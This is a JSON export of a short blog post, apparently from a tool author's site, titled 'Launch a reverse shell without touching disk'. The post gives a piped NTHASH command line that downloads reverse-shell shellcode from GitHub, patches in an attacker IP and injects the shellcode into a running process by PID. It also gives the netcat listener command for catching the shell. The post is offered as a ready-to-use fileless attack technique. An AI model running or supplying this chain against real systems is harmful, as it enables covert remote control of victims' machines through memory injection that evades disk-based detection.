{"id":2454,"date":"2023-07-31T15:21:11","date_gmt":"2023-07-31T13:21:11","guid":{"rendered":"https:\/\/labalec.fr\/erwan\/?p=2454"},"modified":"2023-07-31T16:29:03","modified_gmt":"2023-07-31T14:29:03","slug":"launch-a-reverse-shell-without-touching-disk","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2454","title":{"rendered":"Launch a reverse shell without touching disk"},"content":{"rendered":"\n<p><code>NTHASH-win64 \/download2hexa \/input:https:%2f%2fgithub.com%2ferwan2212%2fNTHASH-FPC%2fraw%2fmaster%2frevshell64.bin| nthash-win64 \/replace \/old:7F000001 \/new:C0A801BE|nthash-win64 \/injectcodehexa \/pid:996<\/code><\/p>\n\n\n\n<p>The above will, in 3 steps:<\/p>\n\n\n\n<ul>\n<li>download a binary and convert it to its textual hex form<\/li>\n<li>replace the default outbound IP (127.0.0.1, hex 7F000001) with the real target IP (here 192.168.1.190, hex C0A801BE)<\/li>\n<li>inject the shellcode into the memory of the specified PID and execute it<\/li>\n<\/ul>\n\n\n\n<p>On the remote host, run <code>nc -l -p 4444<\/code> (note that you could also replace 4444 with a port of your choice in the shellcode).<\/p>\n","protected":false},"excerpt":{"rendered":"<p>NTHASH-win64 \/download2hexa \/input:https:%2f%2fgithub.com%2ferwan2212%2fNTHASH-FPC%2fraw%2fmaster%2frevshell64.bin| nthash-win64 \/replace \/old:7F000001 \/new:C0A801BE|nthash-win64 \/injectcodehexa \/pid:996 The above will, in 3 steps: download a binary and convert it to its textual hex form; replace the default outbound IP (127.0.0.1) with the real target IP (here 192.168.1.190); inject the shellcode into the memory of the specified PID and execute it. On the <a href='https:\/\/labalec.fr\/erwan\/?p=2454' class='excerpt-more'>[&#8230;]<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,118],"tags":[],"class_list":["post-2454","post","type-post","status-publish","format-standard","hentry","category-network","category-nthash","category-5-id","category-118-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2454","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2454"}],"version-history":[{"count":3,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2454\/revisions"}],"predecessor-version":[{"id":2458,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2454\/revisions\/2458"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2454"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2454"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2454"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}